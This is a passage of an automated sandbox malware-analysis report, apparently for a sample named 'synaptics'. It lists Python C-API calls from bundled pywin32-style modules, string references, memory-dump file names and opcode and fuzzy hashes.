                                                                                                                                                                                                              • Instruction ID: f9d015ee0a4ef631f87848213f8423ab282048f84361946a24750d46aa24a07f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: caebe3bc0cf508aeac89208eaf98d203d386fb0d2e57d22f495e7c4a36a902e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F036B6A202018FDB04CF2CC444B10BFE1BB5A314F1582A9E419CB362D775D869CBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,kkkO:AddMandatoryAce,?,?,?), ref: 6BF4291F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseTuple
                                                                                                                                                                                                              • String ID: AddMandatoryAce$kkkO:AddMandatoryAce
                                                                                                                                                                                                              • API String ID: 3371842430-3675006617
                                                                                                                                                                                                              • Opcode ID: 6f502c7c10031ca0384b18868f54dd0c086580655cbf29ab18724b4e1f0a3da3
                                                                                                                                                                                                              • Instruction ID: ccfe8180fe6702b33cf036d629e9369a2b5c683be23f259af82b3e1d9f735912
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f502c7c10031ca0384b18868f54dd0c086580655cbf29ab18724b4e1f0a3da3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F0FE77418201ABC701EF44CC4199F7FF9EB98244F840969F59981132E73AD6289B92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lllO:AddAccessDeniedAceEx,?,?,?), ref: 6BF428BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseTuple
                                                                                                                                                                                                              • String ID: AddAccessDeniedAceEx$lllO:AddAccessDeniedAceEx
                                                                                                                                                                                                              • API String ID: 3371842430-4150984663
                                                                                                                                                                                                              • Opcode ID: 757431a8437c43546e15970621a87280bdd838160194ecd369473831b2e83197
                                                                                                                                                                                                              • Instruction ID: 306730dd205ca007ce6652947c020799794d3070781f834e50ff01e10f9c036c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 757431a8437c43546e15970621a87280bdd838160194ecd369473831b2e83197
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0FE77818201ABD701EF44CC4189F7FF9EB98244F840969F59981132E736D6689B92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lllO:AddAccessAllowedAceEx,?,?,?), ref: 6BF4285F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • AddAccessAllowedAceEx, xrefs: 6BF42879
                                                                                                                                                                                                              • lllO:AddAccessAllowedAceEx, xrefs: 6BF42856
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseTuple
                                                                                                                                                                                                              • String ID: AddAccessAllowedAceEx$lllO:AddAccessAllowedAceEx
                                                                                                                                                                                                              • API String ID: 3371842430-1263352432
                                                                                                                                                                                                              • Opcode ID: bba305b7df70dde079735d209fed7779bd9ba624d5d355efff35bbd3a6c08ce8
                                                                                                                                                                                                              • Instruction ID: b976c9e4ab25c71d9524fb7bf1310afa1d1b64a6c408666d08e6b538c9c3d806
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bba305b7df70dde079735d209fed7779bd9ba624d5d355efff35bbd3a6c08ce8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDF08277418201ABC701EF44CC41C9F7FF9FB98244F800969F59981132E336D2289B93
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • The object is not a PyHANDLE object, xrefs: 6BF44A6A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: The object is not a PyHANDLE object
                                                                                                                                                                                                              • API String ID: 0-1472460041
                                                                                                                                                                                                              • Opcode ID: c174dd5e6cf47dbe0a22f4f72a1fab2fda36e7c4705b71941edf6db7a39aafe0
                                                                                                                                                                                                              • Instruction ID: 0c516303036f785a20d21bdb25fc775d67100fb2323f3e62e75e6bcaef735f99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c174dd5e6cf47dbe0a22f4f72a1fab2fda36e7c4705b71941edf6db7a39aafe0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF01C76514201DFDB05DF14D945B05BFE1AB55302F8184E8F44887332E739D8A8CB15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • The object is not a PyHANDLE object, xrefs: 6BF4444A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: The object is not a PyHANDLE object
                                                                                                                                                                                                              • API String ID: 0-1472460041
                                                                                                                                                                                                              • Opcode ID: c174dd5e6cf47dbe0a22f4f72a1fab2fda36e7c4705b71941edf6db7a39aafe0
                                                                                                                                                                                                              • Instruction ID: b5a968b1f8606b833041ffdb48a6d7bffa1357dc915d24bb38eb589ec81f1f8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c174dd5e6cf47dbe0a22f4f72a1fab2fda36e7c4705b71941edf6db7a39aafe0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F01C766242019FCB05DF14D955B457FE1AB55702F8188E8F84487232D739D894CF11
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:WAVEFORMATEX), ref: 6BF49A3A
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000000,0000001C), ref: 6BF49A5F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                              • String ID: :WAVEFORMATEX
                                                                                                                                                                                                              • API String ID: 709158290-1364142124
                                                                                                                                                                                                              • Opcode ID: 2731a3557919236b31f36b8e81f3b4ce3fc13eb7df6d70ad035048065defa4c7
                                                                                                                                                                                                              • Instruction ID: bbc65283efed6078583c4b580f011933810393996b45072d0854330f6762327e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2731a3557919236b31f36b8e81f3b4ce3fc13eb7df6d70ad035048065defa4c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81E06832D303514BD700DF29DC08A87BBA0EF90346F20866EF44681973E770A6B487E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,?), ref: 6BF47FE6
                                                                                                                                                                                                              • PyObject_HasAttrString.PYTHON310(?,timetuple), ref: 6BF47FF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttrObject_StringSubtypeType_
                                                                                                                                                                                                              • String ID: timetuple
                                                                                                                                                                                                              • API String ID: 1421930220-3328721318
                                                                                                                                                                                                              • Opcode ID: 66275fbc874cd7c5fee86b2f59a9393e7342520605d6f9736e7535f2e24cb283
                                                                                                                                                                                                              • Instruction ID: b3db599b29abfe7f18d9a16e7c65dc147ecc400ce8d7c5b7081072f0de05855a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66275fbc874cd7c5fee86b2f59a9393e7342520605d6f9736e7535f2e24cb283
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4E086325345105BDB24972CFD44AA63FE8AF12302B044058F805D3226E339FCA9C6E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:Detach), ref: 6BF44559
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(?), ref: 6BF4457B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_FromLongLong_ParseTuple
                                                                                                                                                                                                              • String ID: :Detach
                                                                                                                                                                                                              • API String ID: 850207442-4103459575
                                                                                                                                                                                                              • Opcode ID: d430771604af984a37442bd8bcf7b5c58156a9078d7ae64c20c5dc3f07fd20d8
                                                                                                                                                                                                              • Instruction ID: 68ae8e995a571d86a1527dc4e3d5214846911644c3a789110ece4ac4a132ff04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d430771604af984a37442bd8bcf7b5c58156a9078d7ae64c20c5dc3f07fd20d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDE08C325002119BFF10AF20ED04B4A7FE4EF80300F400468EC89E227AEB39ED24CAD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0AD00C
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,PyObject is NULL), ref: 6C0AD022
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$OccurredString
                                                                                                                                                                                                              • String ID: PyObject is NULL
                                                                                                                                                                                                              • API String ID: 114435612-3221357749
                                                                                                                                                                                                              • Opcode ID: 1c6e68e7ac530f5d9ae6589f84e7cc628d2c1926ec10ac60fb74ec153cbaf794
                                                                                                                                                                                                              • Instruction ID: 27e6b23165866e0ee655073fa3dcff230406925f60accdb7bc94a6e5eea95be3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c6e68e7ac530f5d9ae6589f84e7cc628d2c1926ec10ac60fb74ec153cbaf794
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E0E2307183498F9B40DFAAE988E9537F8AB06B597040460EE09C6612EB22E4129A59
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,|ii:ACL,?), ref: 6BF41895
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ParseTuple
                                                                                                                                                                                                              • String ID: @$|ii:ACL
                                                                                                                                                                                                              • API String ID: 3371842430-2672190651
                                                                                                                                                                                                              • Opcode ID: 00684c59533b233f6be3dc3abc4bcef3ba07015ee392a76634bc1b098f7200e4
                                                                                                                                                                                                              • Instruction ID: 97cd85d1429faf6ccb76946c12077e6f87a0c7022231f8ef5e144b9e3b31f4ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00684c59533b233f6be3dc3abc4bcef3ba07015ee392a76634bc1b098f7200e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1D0C7B5414200BBD301EF04C905B5B7BF8FB44304F408919F5CC92165D375D6189A57